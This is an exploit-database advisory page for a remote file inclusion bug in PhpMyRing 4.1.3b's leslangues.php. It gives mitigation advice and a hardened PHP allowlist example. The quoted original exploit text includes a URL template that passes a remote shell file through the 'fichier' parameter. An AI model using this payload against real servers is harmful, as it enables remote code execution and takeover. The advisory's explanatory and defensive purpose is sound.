PhpMyRing - exploit.company
vendor: PhpMyRing
by: ajann
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: PhpMyRing
Affected Version From: <= 4.1.3b
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability

PhpMyRing <= 4.1.3b is vulnerable to remote file inclusion. The vulnerability allows an attacker to include a remote file through the 'fichier' parameter of the 'leslangues.php' script, because the parameter value is concatenated directly into an include() call. This can be exploited to execute arbitrary code on the affected server.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of PhpMyRing or apply appropriate security patches provided by the vendor. Additionally, ensure that user-supplied input is properly validated and sanitized before being used in file inclusion operations.
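The following is an added example, not PhpMyRing's own code: it places the vulnerable include() pattern from the advisory beside a hardened version that maps the request value onto a fixed allowlist of language files. The language codes, file names and the 'lang/' directory layout are assumptions.

```php
<?php
// Added example (not the project's code). The vulnerable pattern from the
// advisory and a hardened replacement; LANGUAGE_FILES and the directory
// layout are assumed for illustration.

// Vulnerable form: with register_globals, $fichier comes straight from the
// query string, so a URL or an arbitrary path ends up inside include().
function load_language_vulnerable(string $fichier): void
{
    include($fichier . ".php");
}

// Hardened form: the request value is only ever used as a key into a fixed
// map of known language files; any other value falls back to the default.
const LANGUAGE_FILES = [
    'fr' => 'francais',   // assumed file name: lang/francais.php
    'en' => 'english',    // assumed file name: lang/english.php
];
const DEFAULT_LANGUAGE = 'fr';

function resolve_language_file(string $langDir, ?string $requested): string
{
    $key = ($requested !== null && isset(LANGUAGE_FILES[$requested]))
        ? $requested
        : DEFAULT_LANGUAGE;
    $base = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$key] . '.php');
    // Defence in depth: the resolved file must exist and must live inside lang/,
    // so even a mistake in the map cannot pull in a file from elsewhere.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('language file not found');
    }
    return $path;
}

function load_language_safe(string $langDir): void
{
    // Read the parameter explicitly instead of relying on register_globals.
    include resolve_language_file($langDir, $_GET['fichier'] ?? null);
}

// A URL, a '../' path or any string that is not a key of LANGUAGE_FILES is
// never used as a path: the resolver silently selects the default language.
```

Independently of the code fix, setting allow_url_include (and allow_url_fopen, on the PHP versions current at the time of the advisory) to Off in php.ini removes the remote half of this bug class, and turning register_globals off stops bare variables such as $fichier from being populated from the query string at all.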
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  PhpMyRing <= 4.1.3b (path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.microniko.net/phpmyring/
# $$      :  Free

*******************************************************************************
[[ERROR]]
..
...
.....
<?
include ($fichier.".php");
?>
..
...
.....

[[/ERROR]]


[[RFI]]

http://[target]/[path]//lang/leslangues.php?fichier=[SHELL]

Example:

//lang/leslangues.php?fichier=http://[target]/[path]/shell.x

[[/RFI]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a Hacker!

# milw0rm.com [2007-01-31]